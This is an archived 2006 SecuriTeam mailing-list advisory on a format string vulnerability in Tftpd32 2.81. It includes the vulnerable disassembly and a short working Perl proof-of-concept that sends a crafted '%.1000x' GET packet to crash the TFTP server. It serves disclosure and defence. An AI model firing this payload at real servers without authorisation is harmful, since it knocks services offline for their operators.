From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 7 Feb 2006 18:21:29 +0200
Subject: [NT] Tftpd SEND and GET Format String Vulnerability
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060208111418.0AB3F5807@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Tftpd SEND and GET Format String Vulnerability
------------------------------------------------------------------------
SUMMARY
" <http://tftpd32.jounin.net/>; Tftpd32 includes DHCP, TFTP, SNTP and
Syslog servers as well as a TFTP client."
A format string vulnerability in Tftpd32 causes DoS when a malformed SEND
or GET request is received.
DETAILS
Vulnerable Systems:
* Tftpd32 version 2.81
Due to incorrect use of format strings there is a possibility of remote
code execution. You can trigger this vulnerability by sending SEND or GET
request with a specially formated string.
Vulnerable code:
LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX ; /Arglist
PUSH EDX ; |Format
PUSH EAX ; |s = 00E6F4E8
CALL DWORD PTR DS:[<&USER32.wvsprintfA>] ; \wvsprintfA
Exploit:
#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research
http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr =>
$host,Proto=> 'udp');
$bzz = "\x00\x01" ; #GET
$bzz .= "%.1000x\x00";
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet
$tftpudp->send($bzz);
ADDITIONAL INFORMATION
The original article can be found at:
<http://www.critical.lt/?vulnerabilities/200>;
http://www.critical.lt/?vulnerabilities/200
Related articles:
* <http://www.securiteam.com/windowsntfocus/6D00D2061G.html>; TFTPD32
Directory Traversal Vulnerability
* <http://www.securiteam.com/windowsntfocus/6C00C2061A.html>; TFTPD32
Buffer Overflow Vulnerability (Long filename)
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
